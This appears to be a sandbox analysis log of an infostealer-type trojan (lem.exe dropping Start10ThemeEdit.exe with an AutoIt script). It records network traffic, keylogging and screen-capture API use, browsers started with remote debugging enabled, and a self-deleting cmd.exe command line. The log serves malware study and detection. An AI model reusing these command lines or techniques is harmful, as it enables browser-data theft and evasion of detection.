Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50144
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 49985 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50067 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50110 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50072 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50051
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 50077 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 50076 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.202.180.73:443 -> 192.168.2.5:49832 version: TLS 1.2

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_2_00879DC5 __EH_prolog3_catch_GS,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard,

6_2_00879DC5

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_2_00879DC5 __EH_prolog3_catch_GS,FillRect,OpenClipboard,EmptyClipboard,CloseClipboard,SetClipboardData,CloseClipboard,

6_2_00879DC5

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_3_02A1EAB5 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,ReleaseDC,CloseWindow,

6_3_02A1EAB5

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_2_008682F1 GetAsyncKeyState,GetAsyncKeyState,SendMessageA,

6_2_008682F1

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00876844 __EH_prolog3_GS,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,SendMessageA,_memset,_free,GetParent,	6_2_00876844
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0083D154 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,	6_2_0083D154
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0086F552 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,	6_2_0086F552
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_008618E9 GetParent,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,SendMessageA,	6_2_008618E9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00863867 MessageBeep,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetKeyState,SendMessageA,GetKeyState,SendMessageA,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,SendMessageA,GetKeyState,SendMessageA,GetKeyState,SendMessageA,SendMessageA,	6_2_00863867

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_3_02A15AD3 memcpy,OpenDesktopA,CreateDesktopA,lstrcpy,CreateProcessA,Sleep,CloseDesktop,

6_3_02A15AD3

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A010E8 NtTerminateThread,	6_3_02A010E8
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A00CD8 NtAllocateVirtualMemory,NtFreeVirtualMemory,	6_3_02A00CD8
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A0066E NtProtectVirtualMemory,	6_3_02A0066E
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A00B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	6_3_02A00B72
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0084E1EF GetClassInfoA,NtdllDefWindowProc_A,	6_2_0084E1EF
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0083AE35 __snprintf_s,__snprintf_s,GetClassInfoA,NtdllDefWindowProc_A,	6_2_0083AE35
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0083B03B NtdllDefWindowProc_A,	6_2_0083B03B
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00877EE6 __EH_prolog3,LoadCursorA,GetClassInfoA,NtdllDefWindowProc_A,	6_2_00877EE6
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0083BE50 NtdllDefWindowProc_A,CallWindowProcA,	6_2_0083BE50
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA2084 NtProtectVirtualMemory,	6_2_00BA2084
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA2046 NtFreeVirtualMemory,	6_2_00BA2046
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA1FF3 NtAllocateVirtualMemory,	6_2_00BA1FF3

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A14B3F	6_3_02A14B3F
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A253AF	6_3_02A253AF
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A271E1	6_3_02A271E1
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A1AF7E	6_3_02A1AF7E
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A25147	6_3_02A25147
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_3_02A27D56	6_3_02A27D56
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_009689B9	6_2_009689B9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_009692E0	6_2_009692E0
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968087	6_2_00968087
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968012	6_2_00968012
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968018	6_2_00968018
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968263	6_2_00968263
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_009683B2	6_2_009683B2
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968630	6_2_00968630
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968782	6_2_00968782
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0084879C	6_2_0084879C
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968722	6_2_00968722
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00968752	6_2_00968752
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0096876B	6_2_0096876B
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_008590C7	6_2_008590C7
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0096914A	6_2_0096914A
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00971593	6_2_00971593
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0083D7B0	6_2_0083D7B0
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00889750	6_2_00889750
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00967A59	6_2_00967A59
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00967A4B	6_2_00967A4B
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00967A6E	6_2_00967A6E
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00961CEF	6_2_00961CEF
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00967C00	6_2_00967C00
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0095DD10	6_2_0095DD10
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00967F2F	6_2_00967F2F
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_0095FF61	6_2_0095FF61
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA05E9	6_2_00BA05E9
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: 6_2_00BA0000	6_2_00BA0000

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 009617D0 appears 47 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 00834170 appears 32 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 02A1D84A appears 34 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 0095D986 appears 44 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 00832500 appears 39 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 0095F543 appears 341 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 0095F576 appears 109 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 00849D82 appears 44 times
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Code function: String function: 0095F5AC appears 33 times

Source: lem.exe

Static PE information: invalid certificate

Source: lem.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: lem.tmp.0.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: lem.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: lem.tmp.2.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-PU8TF.tmp.3.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: is-CJI5N.tmp.3.dr

Static PE information: No import functions for PE file found

Source: lem.exe, 00000000.00000003.2048037350.000000007FE42000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameshfolder.dll~/ vs lem.exe

Source: lem.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: is-CJI5N.tmp.3.dr

Binary or memory string: D:\a\_work\1\s\obj\Microsoft.Developer.IdentityService.csproj\x64\Release\net6.0-windows10.0.18362\win-x64\Microsoft.Developer.IdentityService.pdb

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@76/360@28/22

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_3_02A1F0CA CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

6_3_02A1F0CA

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_2_0084413D CoInitialize,CoCreateInstance,

6_2_0084413D

Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe

Code function: 6_2_0083C0AD FindResourceA,LoadResource,LockResource,FreeResource,

6_2_0083C0AD

Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp

File created: C:\Users\user\AppData\Local\Programs

Source: C:\Users\user\Desktop\lem.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\lem.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp "C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp" /SL5="$20438,15291586,119296,C:\Users\user\Desktop\lem.exe"
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe" /VERYSILENT
Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp "C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp" /SL5="$2043C,15291586,119296,C:\Users\user\Desktop\lem.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-TVMNB.tmp\lem.tmp	Process created: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" allodial.a3x
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2296,i,2357709193393585783,5319373737350838943,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2348,i,10661538599108609215,1196601915293608735,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6732 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=5888 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Roaming\{2836644D-224C-4C95-892D-5D57DDC11073}\Start10ThemeEdit.exe" & rd /s /q "C:\ProgramData\hvaa1" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7004 --field-trial-handle=1964,i,7716502631515619870,9430623312018008994,262144 /prefetch:8
Source: C:\Users\user\Desktop\lem.exe	Process created: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp "C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp" /SL5="$20438,15291586,119296,C:\Users\user\Desktop\lem.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-KSUJ1.tmp\lem.tmp	Process created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe" /VERYSILENT	Jump to behavior
